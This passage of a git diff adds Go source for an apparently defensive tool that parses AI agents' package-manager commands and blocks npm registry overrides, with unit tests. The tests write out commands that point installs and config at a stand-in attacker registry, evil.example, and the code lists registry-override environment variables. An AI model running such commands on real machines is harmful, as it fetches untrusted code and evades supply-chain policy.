index 0000000..bd7b314
--- /dev/null
+++ b/internal/aiagents/ingest/config_test.go
@@ -0,0 +1,119 @@
+package ingest
+
+import (
+	"testing"
+
+	"github.com/step-security/dev-machine-guard/internal/config"
+)
+
+// withConfig stages the DMG config globals for one test case and restores
+// them on cleanup. The DMG config package is package-level mutable, so
+// tests must restore-on-exit to stay independent.
+func withConfig(t *testing.T, customerID, apiEndpoint, apiKey string) {
+	t.Helper()
+	prevCustomer, prevEndpoint, prevKey := config.CustomerID, config.APIEndpoint, config.APIKey
+	t.Cleanup(func() {
+		config.CustomerID = prevCustomer
+		config.APIEndpoint = prevEndpoint
+		config.APIKey = prevKey
+	})
+	config.CustomerID = customerID
+	config.APIEndpoint = apiEndpoint
+	config.APIKey = apiKey
+}
+
+func TestSnapshot_AllValid(t *testing.T) {
+	withConfig(t, "cust-123", "https://api.stepsecurity.io", "sk_live_abc")
+
+	cfg, ok := Snapshot()
+	if !ok {
+		t.Fatal("expected ok=true with all three fields populated")
+	}
+	if cfg.CustomerID != "cust-123" || cfg.APIEndpoint != "https://api.stepsecurity.io" || cfg.APIKey != "sk_live_abc" {
+		t.Errorf("unexpected snapshot: %+v", cfg)
+	}
+}
+
+// Any `{{` anywhere in any of the three fields must fail the gate,
+// including a placeholder embedded mid-string ("partial placeholder").
+func TestSnapshot_RejectsPlaceholders(t *testing.T) {
+	cases := []struct {
+		name, customer, endpoint, key string
+	}{
+		{"placeholder customer", "{{CUSTOMER_ID}}", "https://api.example.com", "sk_live_abc"},
+		{"placeholder endpoint", "cust-123", "{{API_ENDPOINT}}", "sk_live_abc"},
+		{"placeholder key", "cust-123", "https://api.example.com", "{{API_KEY}}"},
+		{"all placeholders", "{{CUSTOMER_ID}}", "{{API_ENDPOINT}}", "{{API_KEY}}"},
+		{"partial placeholder", "cust-123", "https://api.{{HOST}}.io", "sk_live_abc"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			withConfig(t, tc.customer, tc.endpoint, tc.key)
+			if _, ok := Snapshot(); ok {
+				t.Errorf("expected ok=false on placeholder, got true")
+			}
+		})
+	}
+}
+
+func TestSnapshot_RejectsEmpty(t *testing.T) {
+	cases := []struct {
+		name, customer, endpoint, key string
+	}{
+		{"empty customer", "", "https://api.example.com", "sk_live_abc"},
+		{"empty endpoint", "cust-123", "", "sk_live_abc"},
+		{"empty key", "cust-123", "https://api.example.com", ""},
+		{"all empty", "", "", ""},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			withConfig(t, tc.customer, tc.endpoint, tc.key)
+			if _, ok := Snapshot(); ok {
+				t.Errorf("expected ok=false on empty field, got true")
+			}
+		})
+	}
+}
+
+func TestSnapshot_RejectsWhitespaceOnly(t *testing.T) {
+	withConfig(t, "   ", "\t\n", " ")
+	if _, ok := Snapshot(); ok {
+		t.Error("expected ok=false on whitespace-only fields")
+	}
+}
+
+func TestSnapshot_TrimsSurroundingWhitespace(t *testing.T) {
+	withConfig(t, "  cust-123  ", "\thttps://api.example.com\n", " sk_live_abc ")
+	cfg, ok := Snapshot()
+	if !ok {
+		t.Fatal("expected ok=true after trimming")
+	}
+	if cfg.CustomerID != "cust-123" || cfg.APIEndpoint != "https://api.example.com" || cfg.APIKey != "sk_live_abc" {
+		t.Errorf("expected trimmed values, got %+v", cfg)
+	}
+}
+
+func TestSnapshot_AcceptsSingleBrace(t *testing.T) {
+	// The placeholder marker is `{{` (double brace) per the build-time
+	// substitution scheme. A single `{` is a legitimate URL/token char
+	// (e.g., a query template var) and must NOT trip the gate.
+	withConfig(t, "cust-{abc}", "https://api.example.com/v1?ctx={ts}", "sk_live_abc")
+	cfg, ok := Snapshot()
+	if !ok {
+		t.Fatal("expected ok=true; single-brace inputs should pass the placeholder gate")
+	}
+	if cfg.CustomerID != "cust-{abc}" {
+		t.Errorf("single-brace value mutated: %q", cfg.CustomerID)
+	}
+}
+
+func TestSnapshot_PopulatesEvenWhenInvalid(t *testing.T) {
+	// Diagnostics need access to whatever the user did configure, even when
+	// the gate refuses. Confirm Config is not zero-valued on the false path.
+	withConfig(t, "cust-123", "", "sk_live_abc")
+	cfg, ok := Snapshot()
+	if ok {
+		t.Fatal("expected ok=false (empty endpoint)")
+	}
+	if cfg.CustomerID != "cust-123" || cfg.APIKey != "sk_live_abc" {
+		t.Errorf("expected populated diagnostic snapshot, got %+v", cfg)
+	}
+}
diff --git a/internal/aiagents/policy/builtin/policy.json b/internal/aiagents/policy/builtin/policy.json
new file mode 100644
index 0000000..029b7ac
--- /dev/null
+++ b/internal/aiagents/policy/builtin/policy.json
@@ -0,0 +1,12 @@
+{
+  "version": 1,
+  "mode": "audit",
+  "ecosystems": {
+    "npm": {
+      "enabled": true,
+      "registry": {
+        "allowlist": ["https://registry.stepsecurity.io/"]
+      }
+    }
+  }
+}
diff --git a/internal/aiagents/policy/bypass.go b/internal/aiagents/policy/bypass.go
new file mode 100644
index 0000000..ed1bef1
--- /dev/null
+++ b/internal/aiagents/policy/bypass.go
@@ -0,0 +1,141 @@
+package policy
+
+import (
+	"strings"
+
+	"github.com/google/shlex"
+)
+
+// ParsedCommand is the pre-policy view of a shell argv: the leading
+// `KEY=VAL` env, the package manager binary, the residual args, plus the
+// flags we care about.
+type ParsedCommand struct {
+	InlineEnv      map[string]string // leading KEY=VAL assignments (and after an `env` wrapper)
+	Binary         string            // basename of the invoked binary, e.g. "npm"
+	Args           []string          // argv after the binary
+	RegistryFlag   string            // value of --registry, if present on argv
+	UserconfigFlag string            // value of --userconfig, if present on argv
+	// ConfigOp is "" unless argv looks like ` config ...`.
+	ConfigOp    string
+	ConfigKey   string
+	ConfigValue string
+}
+
+// ParseShell tokenizes cmd and pulls out the pieces the policy evaluator
+// cares about.
Unknown commands return Binary="" and the caller should +// treat the parse as a no-op. +func ParseShell(cmd string) ParsedCommand { + tokens, err := shlex.Split(cmd) + if err != nil || len(tokens) == 0 { + tokens = strings.Fields(cmd) + if len(tokens) == 0 { + return ParsedCommand{} + } + } + out := ParsedCommand{InlineEnv: map[string]string{}} + for len(tokens) > 0 { + t := tokens[0] + if t == "env" { + tokens = tokens[1:] + continue + } + if eq := strings.IndexByte(t, '='); eq > 0 && !strings.HasPrefix(t, "-") { + key := t[:eq] + if isShellIdent(key) { + out.InlineEnv[key] = t[eq+1:] + tokens = tokens[1:] + continue + } + } + break + } + if len(tokens) == 0 { + return out + } + bin := tokens[0] + if idx := strings.LastIndexByte(bin, '/'); idx >= 0 { + bin = bin[idx+1:] + } + out.Binary = bin + out.Args = tokens[1:] + + out.RegistryFlag = extractFlagValue(out.Args, "--registry") + out.UserconfigFlag = extractFlagValue(out.Args, "--userconfig") + + if op, key, val, ok := extractConfigOp(out.Args); ok { + out.ConfigOp = op + out.ConfigKey = key + out.ConfigValue = val + } + return out +} + +// extractFlagValue finds `--flag=value` or `--flag value` and returns value. +func extractFlagValue(args []string, flag string) string { + for i, a := range args { + if a == flag && i+1 < len(args) { + return args[i+1] + } + if v, ok := strings.CutPrefix(a, flag+"="); ok { + return v + } + } + return "" +} + +// extractConfigOp recognizes `config set `, `config delete `, or +// `config edit`. Returns ("set"|"delete"|"edit", key, value, true). +// pnpm uses `pnpm config set`, yarn uses `yarn config set`, etc. +func extractConfigOp(args []string) (op, key, value string, ok bool) { + // Skip leading flags before the "config" subcommand. + i := 0 + for i < len(args) && strings.HasPrefix(args[i], "-") { + // Skip values for known value-bearing flags. 
+ if eq := strings.IndexByte(args[i], '='); eq < 0 { + if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") { + i++ + } + } + i++ + } + if i >= len(args) || args[i] != "config" { + return "", "", "", false + } + i++ + if i >= len(args) { + return "", "", "", false + } + switch args[i] { + case "set": + if i+2 < len(args) { + return "set", args[i+1], args[i+2], true + } + if i+1 < len(args) { + return "set", args[i+1], "", true + } + case "delete", "rm": + if i+1 < len(args) { + return "delete", args[i+1], "", true + } + case "edit": + return "edit", "", "", true + } + return "", "", "", false +} + +func isShellIdent(s string) bool { + if s == "" { + return false + } + for i, r := range s { + switch { + case r >= 'A' && r <= 'Z': + case r >= 'a' && r <= 'z': + case r == '_': + case i > 0 && r >= '0' && r <= '9': + default: + return false + } + } + return true +} diff --git a/internal/aiagents/policy/bypass_test.go b/internal/aiagents/policy/bypass_test.go new file mode 100644 index 0000000..3452cad --- /dev/null +++ b/internal/aiagents/policy/bypass_test.go @@ -0,0 +1,82 @@ +package policy + +import "testing" + +func TestParseShellExtractsRegistryFlag(t *testing.T) { + for _, in := range []string{ + "npm install --registry=https://evil.example/ lodash", + "npm install --registry https://evil.example/ lodash", + } { + got := ParseShell(in) + if got.Binary != "npm" { + t.Errorf("%q: bin %s", in, got.Binary) + } + if got.RegistryFlag != "https://evil.example/" { + t.Errorf("%q: registry %s", in, got.RegistryFlag) + } + } +} + +func TestParseShellExtractsUserconfig(t *testing.T) { + got := ParseShell("npm install --userconfig=/tmp/x.npmrc") + if got.UserconfigFlag != "/tmp/x.npmrc" { + t.Errorf("userconfig: %s", got.UserconfigFlag) + } +} + +func TestParseShellExtractsInlineEnv(t *testing.T) { + got := ParseShell("NPM_CONFIG_REGISTRY=https://evil.example/ DEBUG=1 npm install") + if got.InlineEnv["NPM_CONFIG_REGISTRY"] != "https://evil.example/" { + t.Errorf("env 
 NPM_CONFIG_REGISTRY: %v", got.InlineEnv)
+	}
+	if got.InlineEnv["DEBUG"] != "1" {
+		t.Errorf("env DEBUG: %v", got.InlineEnv)
+	}
+	if got.Binary != "npm" {
+		t.Errorf("bin: %s", got.Binary)
+	}
+}
+
+// The `env` wrapper must be transparent: binary and inline env are the
+// same as without it.
+func TestParseShellHandlesEnvPrefix(t *testing.T) {
+	got := ParseShell("env NPM_CONFIG_REGISTRY=https://evil.example/ npm install")
+	if got.InlineEnv["NPM_CONFIG_REGISTRY"] != "https://evil.example/" {
+		t.Errorf("env: %v", got.InlineEnv)
+	}
+	if got.Binary != "npm" {
+		t.Errorf("bin: %s", got.Binary)
+	}
+}
+
+func TestParseShellRecognizesConfigSet(t *testing.T) {
+	got := ParseShell("npm config set registry https://evil.example/")
+	if got.ConfigOp != "set" {
+		t.Errorf("op: %s", got.ConfigOp)
+	}
+	if got.ConfigKey != "registry" || got.ConfigValue != "https://evil.example/" {
+		t.Errorf("key/value: %s %s", got.ConfigKey, got.ConfigValue)
+	}
+}
+
+func TestParseShellRecognizesConfigDelete(t *testing.T) {
+	got := ParseShell("npm config delete registry")
+	if got.ConfigOp != "delete" || got.ConfigKey != "registry" {
+		t.Errorf("op/key: %s %s", got.ConfigOp, got.ConfigKey)
+	}
+}
+
+func TestParseShellRecognizesConfigEdit(t *testing.T) {
+	got := ParseShell("npm config edit")
+	if got.ConfigOp != "edit" {
+		t.Errorf("op: %s", got.ConfigOp)
+	}
+}
+
+func TestParseShellPathPrefixedBinaryStripped(t *testing.T) {
+	got := ParseShell("/usr/local/bin/pnpm install --registry=https://x/")
+	if got.Binary != "pnpm" {
+		t.Errorf("bin: %s", got.Binary)
+	}
+	if got.RegistryFlag != "https://x/" {
+		t.Errorf("registry: %s", got.RegistryFlag)
+	}
+}
diff --git a/internal/aiagents/policy/decision.go b/internal/aiagents/policy/decision.go
new file mode 100644
index 0000000..6fd8766
--- /dev/null
+++ b/internal/aiagents/policy/decision.go
@@ -0,0 +1,48 @@
+package policy
+
+// DecisionCode names a structured reason. Codes go to the JSONL audit
+// record; the agent only sees Decision.UserMessage, which is intentionally
+// generic.
+type DecisionCode string
+
+const (
+	CodeAllowed            DecisionCode = "allowed"
+	CodeRegistryNotAllowed DecisionCode = "registry_not_allowed"
+	CodeRegistryFlag       DecisionCode = "registry_flag_override"
+	CodeRegistryEnv        DecisionCode = "registry_env_override"
+	CodeUserconfigFlag     DecisionCode = "userconfig_override"
+	CodeManagedKeyMutation DecisionCode = "managed_key_mutation"
+	CodeManagedKeyEdit     DecisionCode = "managed_key_edit"
+	// CodeInsufficientData marks a fail-open allow: the evaluator could
+	// not resolve enough context (e.g. no registry) to decide.
+	CodeInsufficientData DecisionCode = "insufficient_data"
+	CodePolicyDisabled   DecisionCode = "policy_disabled"
+	CodeNotInstallCommand DecisionCode = "not_install_command"
+)
+
+// GenericBlockMessage is the literal phrase shown to the agent on any
+// block. It does not name files, registries, or packages — that detail
+// goes to JSONL only, so the agent cannot guide the user to a bypass.
+const GenericBlockMessage = "Blocked by your organization's administrator."
+
+// Decision is the evaluator's output. Adapters consume only Allow and
+// UserMessage; Code and InternalDetail are JSONL-only.
+type Decision struct {
+	Allow          bool
+	Code           DecisionCode
+	UserMessage    string
+	InternalDetail string
+}
+
+// AllowDecision builds an explicit allow decision with the given code.
+// UserMessage stays empty: there is nothing to tell the agent on allow.
+func AllowDecision(code DecisionCode, detail string) Decision {
+	return Decision{Allow: true, Code: code, InternalDetail: detail}
+}
+
+// BlockDecision builds a block decision with the generic user message.
+func BlockDecision(code DecisionCode, detail string) Decision {
+	return Decision{
+		Allow:          false,
+		Code:           code,
+		UserMessage:    GenericBlockMessage,
+		InternalDetail: detail,
+	}
+}
diff --git a/internal/aiagents/policy/ecosystem.go b/internal/aiagents/policy/ecosystem.go
new file mode 100644
index 0000000..653a423
--- /dev/null
+++ b/internal/aiagents/policy/ecosystem.go
@@ -0,0 +1,42 @@
+package policy
+
+// Ecosystem names a language family the runtime can enforce policy on.
+// One ecosystem subsumes multiple package-manager binaries (e.g.
npm, +// pnpm, yarn, and bun all live under EcosystemNPM). Future entries: +// pypi, cargo, go. +type Ecosystem string + +const ( + EcosystemNPM Ecosystem = "npm" +) + +// EcosystemFor maps an observed PM binary to its ecosystem. It returns "" +// when the binary does not belong to any ecosystem the runtime enforces +// today; callers treat that as "not policy-relevant" and fall through to +// allow. +// +// This is the single binary→ecosystem dispatch in the codebase; do not +// reproduce the table elsewhere. +func EcosystemFor(binary string) Ecosystem { + switch binary { + case "npm", "npx", "pnpm", "pnpx", "yarn", "bun", "bunx": + return EcosystemNPM + } + return "" +} + +// KnownEcosystems lists the ecosystems the runtime recognizes. +func KnownEcosystems() []Ecosystem { + return []Ecosystem{EcosystemNPM} +} + +// IsKnown reports whether e is one of the ecosystems the runtime +// recognizes. +func IsKnown(e Ecosystem) bool { + for _, k := range KnownEcosystems() { + if k == e { + return true + } + } + return false +} diff --git a/internal/aiagents/policy/eval.go b/internal/aiagents/policy/eval.go new file mode 100644 index 0000000..b0cfe78 --- /dev/null +++ b/internal/aiagents/policy/eval.go @@ -0,0 +1,200 @@ +package policy + +import ( + "strings" +) + +// Request is what the runtime hands to Eval after parsing a hook payload. +// All fields are optional except Ecosystem + CommandKind; missing data +// tends toward Allow (fail-open). +type Request struct { + Ecosystem Ecosystem // resolved by EcosystemFor(parsed.Binary) + PackageManager string // raw binary observed: "npm" | "pnpm" | "yarn" | "bun" | "npx" | ... + CommandKind string // "install" | "config_set" | "config_delete" | "config_edit" | "exec" | ... + Registry string // resolved per cwd, e.g. 
 "https://registry.npmjs.org/"
+	RegistryFlag     string            // value of --registry= if present on argv
+	UserconfigFlag   string            // value of --userconfig= if present on argv
+	InlineEnv        map[string]string // KEY=VAL prefix env vars on argv
+	ConfigKeyMutated string            // for config_set/config_delete: which key
+	ConfigValue      string            // for config_set: the new value
+}
+
+// Eval is a pure function over Policy + Request. The runtime persists the
+// returned Decision both on the JSONL event and (via the adapter) on the
+// stdout response.
+func Eval(p Policy, req Request) Decision {
+	// A missing or disabled per-ecosystem block means this ecosystem is
+	// not enforced at all: allow with a code that says why.
+	block, ok := p.Ecosystems[req.Ecosystem]
+	if !ok || !block.Enabled {
+		return AllowDecision(CodePolicyDisabled, "policy disabled for ecosystem "+string(req.Ecosystem))
+	}
+	return evalForEcosystem(block, req)
+}
+
+// evalForEcosystem dispatches on the command kind. Anything not listed
+// here is not policy-relevant and allows.
+func evalForEcosystem(block EcosystemPolicy, req Request) Decision {
+	switch req.CommandKind {
+	// "publish" is routed through the install path: it talks to a
+	// registry the same way an install does, so the same pinning applies.
+	case "install", "publish":
+		return evalInstall(block, req)
+	case "config_set":
+		return evalConfigSet(block, req)
+	case "config_delete":
+		if isManagedKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) {
+			return BlockDecision(CodeManagedKeyMutation,
+				"config delete on managed key "+req.ConfigKeyMutated)
+		}
+		return AllowDecision(CodeAllowed, "non-managed config delete")
+	case "config_edit":
+		return BlockDecision(CodeManagedKeyEdit,
+			"interactive config edit could mutate managed keys")
+	default:
+		return AllowDecision(CodeNotInstallCommand,
+			"command kind "+req.CommandKind+" not policy-relevant")
+	}
+}
+
+// evalInstall enforces registry pinning for install/publish-shaped
+// commands. A --userconfig override is blocked outright; otherwise the
+// single registry the PM will actually use is checked.
+func evalInstall(block EcosystemPolicy, req Request) Decision {
+	if req.UserconfigFlag != "" {
+		return BlockDecision(CodeUserconfigFlag,
+			"--userconfig points at "+req.UserconfigFlag)
+	}
+	// Precedence: a CLI flag wins, then inline env, then system config.
+	// We only check the level the package manager will actually use; the
+	// lower-precedence registries are moot for this invocation.
+	if req.RegistryFlag != "" {
+		if !registryAllowed(block.Registry.Allowlist, req.RegistryFlag) {
+			return BlockDecision(CodeRegistryFlag,
+				"--registry="+req.RegistryFlag+" not in allowlist")
+		}
+		return AllowDecision(CodeAllowed, "registry flag allowlisted")
+	}
+	if envReg := envRegistryOverride(req.Ecosystem, req.InlineEnv); envReg != "" {
+		if !registryAllowed(block.Registry.Allowlist, envReg) {
+			return BlockDecision(CodeRegistryEnv,
+				"inline env registry "+envReg+" not in allowlist")
+		}
+		return AllowDecision(CodeAllowed, "env registry allowlisted")
+	}
+	if req.Registry == "" {
+		// Cannot resolve; fail-open with an audit-able code.
+		return AllowDecision(CodeInsufficientData, "no registry resolved")
+	}
+	if !registryAllowed(block.Registry.Allowlist, req.Registry) {
+		return BlockDecision(CodeRegistryNotAllowed,
+			"registry "+req.Registry+" not in allowlist")
+	}
+	return AllowDecision(CodeAllowed, "registry allowlisted")
+}
+
+// evalConfigSet gates mutations of managed keys. Registry keys may be
+// set to an allowlisted value; every other managed key is immutable.
+func evalConfigSet(block EcosystemPolicy, req Request) Decision {
+	if !isManagedKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) {
+		return AllowDecision(CodeAllowed, "non-managed config key")
+	}
+	// Setting a managed registry key to an allowlisted value is fine.
+	if isRegistryKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) {
+		if registryAllowed(block.Registry.Allowlist, req.ConfigValue) {
+			return AllowDecision(CodeAllowed, "managed registry set to allowlisted value")
+		}
+		return BlockDecision(CodeRegistryNotAllowed,
+			"config set "+req.ConfigKeyMutated+"="+req.ConfigValue+" not allowlisted")
+	}
+	// Cooldown / other managed keys: block unconditional mutation; the
+	// authoritative value is owned by the runtime.
+	return BlockDecision(CodeManagedKeyMutation,
+		"config set on managed key "+req.ConfigKeyMutated)
+}
+
+// registryAllowed normalizes both sides (trailing slash) and prefix-matches.
+func registryAllowed(allowlist []string, candidate string) bool {
+	cand := normalizeRegistry(candidate)
+	if cand == "" {
+		return false
+	}
+	for _, entry := range allowlist {
+		norm := normalizeRegistry(entry)
+		if norm != "" && strings.HasPrefix(cand, norm) {
+			return true
+		}
+	}
+	return false
+}
+
+// normalizeRegistry trims whitespace and guarantees exactly one trailing
+// slash. We deliberately do NOT lowercase scheme/host: path-bearing
+// registry URLs make host-only case folding lossy, and callers supply
+// real, unquoted URLs.
+func normalizeRegistry(s string) string {
+	trimmed := strings.TrimSpace(s)
+	switch {
+	case trimmed == "":
+		return ""
+	case strings.HasSuffix(trimmed, "/"):
+		return trimmed
+	default:
+		return trimmed + "/"
+	}
+}
+
+// managedKeysFor returns the per-PM managed-key table for an ecosystem.
+// New ecosystems add a case; non-config-set ecosystems can return nil.
+func managedKeysFor(eco Ecosystem) map[string]map[string]struct{} {
+	switch eco {
+	case EcosystemNPM:
+		return map[string]map[string]struct{}{
+			"npm":  {"registry": {}, "min-release-age": {}, "ignore-scripts": {}},
+			"pnpm": {"registry": {}, "minimum-release-age": {}, "min-release-age": {}, "ignoreScripts": {}, "ignore-scripts": {}},
+			"yarn": {"npmRegistryServer": {}, "npmMinimalAgeGate": {}, "enableScripts": {}},
+			"bun":  {"registry": {}, "minimumReleaseAge": {}, "ignoreScripts": {}},
+		}
+	}
+	return nil
+}
+
+// isManagedKey reports whether key is one of the runtime-owned config
+// keys for the given ecosystem + package manager.
+func isManagedKey(eco Ecosystem, pm, key string) bool {
+	if key == "" {
+		return false
+	}
+	keysByPM := managedKeysFor(eco)
+	if keysByPM == nil {
+		return false
+	}
+	managed, known := keysByPM[pm]
+	if !known {
+		return false
+	}
+	_, hit := managed[key]
+	return hit
+}
+
+// isRegistryKey reports whether key names the registry setting for the
+// given package manager (yarn spells it differently).
+func isRegistryKey(eco Ecosystem, pm, key string) bool {
+	if eco != EcosystemNPM {
+		return false
+	}
+	if pm == "yarn" {
+		return key == "npmRegistryServer"
+	}
+	return key == "registry"
+}
+
+// envRegistryOverride returns the registry URL set by an inline
+// `KEY=VAL ` prefix, or "" if none of the recognized keys are set.
+func envRegistryOverride(eco Ecosystem, env map[string]string) string {
+	if len(env) == 0 {
+		return ""
+	}
+	// Keys are checked in a fixed order so the result is deterministic
+	// even when several overrides are present.
+	var keys []string
+	switch eco {
+	case EcosystemNPM:
+		keys = []string{
+			"NPM_CONFIG_REGISTRY",
+			"PNPM_CONFIG_REGISTRY",
+			"YARN_NPM_REGISTRY_SERVER",
+			"BUN_CONFIG_REGISTRY",
+		}
+	}
+	for _, k := range keys {
+		if v, ok := env[k]; ok && v != "" {
+			return v
+		}
+	}
+	return ""
+}
diff --git a/internal/aiagents/policy/eval_test.go b/internal/aiagents/policy/eval_test.go
new file mode 100644
index 0000000..e03fe5e
--- /dev/null
+++ b/internal/aiagents/policy/eval_test.go
@@ -0,0 +1,237 @@
+package policy
+
+import "testing"
+
+// basePolicy is a fresh enabled npm policy per call; tests mutate their
+// own copy, so no cross-test state is shared.
+func basePolicy() Policy {
+	return Policy{
+		Version: 1,
+		Ecosystems: map[Ecosystem]EcosystemPolicy{
+			EcosystemNPM: {
+				Enabled:  true,
+				Registry: RegistryPolicy{Allowlist: []string{"https://registry.npmjs.org/"}},
+			},
+		},
+	}
+}
+
+func TestEvalDisabledPolicyAllows(t *testing.T) {
+	p := basePolicy()
+	npm := p.Ecosystems[EcosystemNPM]
+	npm.Enabled = false
+	p.Ecosystems[EcosystemNPM] = npm
+	got := Eval(p, Request{Ecosystem: EcosystemNPM, PackageManager: "npm", CommandKind: "install", Registry: "https://evil.example/"})
+	if !got.Allow {
+		t.Errorf("expected allow when policy disabled")
+	}
+	if got.Code != CodePolicyDisabled {
+		t.Errorf("code: %s", got.Code)
+	}
+}
+
+func TestEvalUnknownEcosystemAllows(t *testing.T) {
+	got := Eval(basePolicy(), Request{Ecosystem: Ecosystem("pypi"), PackageManager: "pip", CommandKind: "install"})
+	if !got.Allow {
+		t.Errorf("expected allow for ecosystem with no policy block")
+	}
+	if got.Code != CodePolicyDisabled {
+		t.Errorf("code: %s", got.Code)
+	}
+}
+
+func TestEvalAllowsAllowlistedRegistry(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://registry.npmjs.org/",
+	})
+	if !got.Allow {
+		t.Errorf("expected allow, got: %+v", got)
+	}
+}
+
+func TestEvalNormalizesTrailingSlash(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://registry.npmjs.org",
+	})
+	if !got.Allow {
+		t.Errorf("expected allow on trailing-slash mismatch, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksUnallowlistedRegistry(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://evil.example/",
+	})
+	if got.Allow {
+		t.Errorf("expected block")
+	}
+	if got.Code != CodeRegistryNotAllowed {
+		t.Errorf("code: %s", got.Code)
+	}
+	if got.UserMessage != GenericBlockMessage {
+		t.Errorf("user message leaked detail: %q", got.UserMessage)
+	}
+	if got.InternalDetail == "" {
+		t.Error("expected internal detail for audit")
+	}
+}
+
+func TestEvalAllowlistedFlagWinsOverNonallowlistedEffective(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://stale.example/",
+		RegistryFlag:   "https://registry.npmjs.org/",
+	})
+	if !got.Allow {
+		t.Errorf("expected allow when flag is allowlisted, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksRegistryFlagOverride(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://registry.npmjs.org/",
+		RegistryFlag:   "https://evil.example/",
+	})
+	if got.Allow || got.Code != CodeRegistryFlag {
+		t.Errorf("expected registry_flag block, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksUserconfigOverride(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://registry.npmjs.org/",
+		UserconfigFlag: "/tmp/evil.npmrc",
+	})
+	if got.Allow || got.Code != CodeUserconfigFlag {
+		t.Errorf("expected userconfig block, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksEnvRegistryOverride(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://registry.npmjs.org/",
+		InlineEnv:      map[string]string{"NPM_CONFIG_REGISTRY": "https://evil.example/"},
+	})
+	if got.Allow || got.Code != CodeRegistryEnv {
+		t.Errorf("expected env block, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksConfigSetOnManagedRegistry(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:        EcosystemNPM,
+		PackageManager:   "npm",
+		CommandKind:      "config_set",
+		ConfigKeyMutated: "registry",
+		ConfigValue:      "https://evil.example/",
+	})
+	if got.Allow || got.Code != CodeRegistryNotAllowed {
+		t.Errorf("expected block on config set registry to non-allowlisted, got: %+v", got)
+	}
+}
+
+func TestEvalAllowsConfigSetOnUnmanagedKey(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:        EcosystemNPM,
+		PackageManager:   "npm",
+		CommandKind:      "config_set",
+		ConfigKeyMutated: "color",
+		ConfigValue:      "true",
+	})
+	if !got.Allow {
+		t.Errorf("expected allow on unmanaged key, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksConfigDeleteOnManagedKey(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:        EcosystemNPM,
+		PackageManager:   "npm",
+		CommandKind:      "config_delete",
+		ConfigKeyMutated: "registry",
+	})
+	if got.Allow || got.Code != CodeManagedKeyMutation {
+		t.Errorf("expected block, got: %+v", got)
+	}
+}
+
+func TestEvalBlocksConfigEdit(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "config_edit",
+	})
+	if got.Allow || got.Code != CodeManagedKeyEdit {
+		t.Errorf("expected config_edit block, got: %+v", got)
+	}
+}
+
+func TestEvalAllowsInsufficientData(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "pnpm",
+		CommandKind:    "install",
+	})
+	if !got.Allow {
+		t.Errorf("expected allow on missing registry data")
+	}
+	if got.Code != CodeInsufficientData {
+		t.Errorf("code: %s", got.Code)
+	}
+}
+
+func TestEvalBlocksConfigSetOnManagedCooldownKey(t *testing.T) {
+	got := Eval(basePolicy(), Request{
+		Ecosystem:        EcosystemNPM,
+		PackageManager:   "npm",
+		CommandKind:      "config_set",
+		ConfigKeyMutated: "min-release-age",
+		ConfigValue:      "0",
+	})
+	if got.Allow || got.Code != CodeManagedKeyMutation {
+		t.Errorf("expected block on cooldown key mutation, got: %+v", got)
+	}
+}
+
+func TestEvalAllowlistPrefixMatch(t *testing.T) {
+	p := basePolicy()
+	npm := p.Ecosystems[EcosystemNPM]
+	npm.Registry.Allowlist = []string{"https://proxy.example/orgs/acme/"}
+	p.Ecosystems[EcosystemNPM] = npm
+	got := Eval(p, Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://proxy.example/orgs/acme/repo-a/",
+	})
+	if !got.Allow {
+		t.Errorf("expected prefix-match allow, got: %+v", got)
+	}
+	got = Eval(p, Request{
+		Ecosystem:      EcosystemNPM,
+		PackageManager: "npm",
+		CommandKind:    "install",
+		Registry:       "https://proxy.example/orgs/other/",
+	})
+	if got.Allow {
+		t.Errorf("expected prefix-match block")
+	}
+}
diff --git a/internal/aiagents/policy/policy.go b/internal/aiagents/policy/policy.go
new file mode 100644
index 0000000..a69ac2c
--- /dev/null
+++ b/internal/aiagents/policy/policy.go
@@ -0,0 +1,81 @@
+// Package policy holds the policy data model and pure decision
+// evaluator. The package is agent-agnostic: adapters consume only the
+// resulting Decision; the package never imports adapter code.
+//
+// The active policy is the embedded default at policy/builtin/policy.json.
+// A future revision will replace Builtin() with a fetch from the
+// StepSecurity backend; call sites consume Policy values and need not
+// change. There is intentionally no on-disk override.
+package policy
+
+import (
+	_ "embed"
+	"encoding/json"
+	"fmt"
